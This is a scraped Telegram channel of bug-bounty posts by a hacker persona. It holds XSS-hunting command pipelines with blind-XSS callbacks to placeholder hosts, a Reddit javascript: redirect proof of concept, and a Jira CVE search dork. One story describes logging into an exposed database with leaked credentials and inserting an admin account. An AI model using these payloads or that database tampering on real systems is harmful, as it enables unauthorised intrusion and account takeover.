Hey Hunters,
DarkShadow here—back again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shell—no more manual payload hunting!
Let me know if you need👀
DarkShadow here—back again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shell—no more manual payload hunting!
Let me know if you need👀
🔥19👍7🐳2
More tools, tips, and hacking content coming your way!
Stay connected with us — the journey has just begun.
Don’t forget to like and share!
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍25❤11🔥4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands😉
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
2. Gospider + Dalfox
4. Gospider + Dalfox (Deep Crawl)
Required tools are:
If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me 👉🏼 DarkShadow
#bugbountytips #xss
DarkShadow here back again, dropping some one-liner killer XSS commands😉
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, don’t forget to follow me 👉🏼 DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
🔥13👍7👏5👨💻3
Good morning hacker's,
Let's start morning to hack Reddit account 😉
Let's start morning to hack Reddit account 😉
😁11🫡2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Let’s break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But here’s the twist...
✅ PoC Steps (Super Simple):
Boom💥. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation — just a mindset shift.
keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and follow me in X
👉🏼 DarkShadow
#bugbountytips #xss
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Let’s break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But here’s the twist...
✅ PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boom💥. That’s it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation — just a mindset shift.
keep your payloads sharp and your eyes sharper.
Don’t forget to react, share, and follow me in X
👉🏼 DarkShadow
#bugbountytips #xss
👏18👍10🔥7🗿4❤2
Who are you in the world of cybersecurity?
Anonymous Poll
42%
Beginner — currently learning cybersecurity 👀
25%
Bug bounty hunter — actually reporting vulnerabilities 🔥
7%
Red teamer — simulating real-world attacks to improve defenses 💥
15%
Professional Pentester – Working in a cybersecurity job role ✨
11%
Black hat hacker — unauthorized hacking ☠️
🔥11🐳8❤1👍1
Hey Hunter's,
DarkShadow here back again, dropping a killer trick 🌀
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me 👉🏼 DarkShadow
DarkShadow here back again, dropping a killer trick 🌀
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me 👉🏼 DarkShadow
🔥22👍7❤3👏3🐳1👨💻1🫡1
https://github.com/NazaninNazari/Origin_ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥10
Forwarded from Brut Security 2.0
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 rating❗️
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
👉 Link: https://nt.ls/lVuft
👉 Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
👉 Link: https://nt.ls/lVuft
👉 Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
🔥6👍2
The heavy recon features? Still cooking.
🔗 addons.mozilla.org/addon/brutscope-extractor
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍5
https://github.com/sw33tLie/uff
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22❤10👍5
Why there is no reactions🙂 ?
Do let us know what content you guys looking for👀
Do let us know what content you guys looking for
Please open Telegram to view this post
VIEW IN TELEGRAM
❤34😢5👍3🤝3😁1
🔥 Tried something new! Just dropped a quick guide on rooting Android Emulator + setting up Burp Suite for HTTPS interception.
✅ Manual setup
✅ Magisk + rootAVD
✅ Trusted Burp cert
✅ Meme vibes included 😎
📖 Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
✅ Manual setup
✅ Magisk + rootAVD
✅ Trusted Burp cert
✅ Meme vibes included 😎
📖 Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
1🔥23❤8
Hey Hunters,
DarkShadow here back again—sorry for the delay, I’ve been a little sick. Please keep me in your prayers.
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
DarkShadow here back again—sorry for the delay, I’ve been a little sick. Please keep me in your prayers.
Anyway, just dropping a trick on how an out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
👏20❤10👍5😱4
https://powerade.com.s3.amazonaws.com/index.html
guy's let's see whos explaination is better!
what is the impact after takeover a in-scop target S3 bucket?🤔
guy's let's see whos explaination is better!
what is the impact after takeover a in-scop target S3 bucket?🤔
👍11🔥5❤1🗿1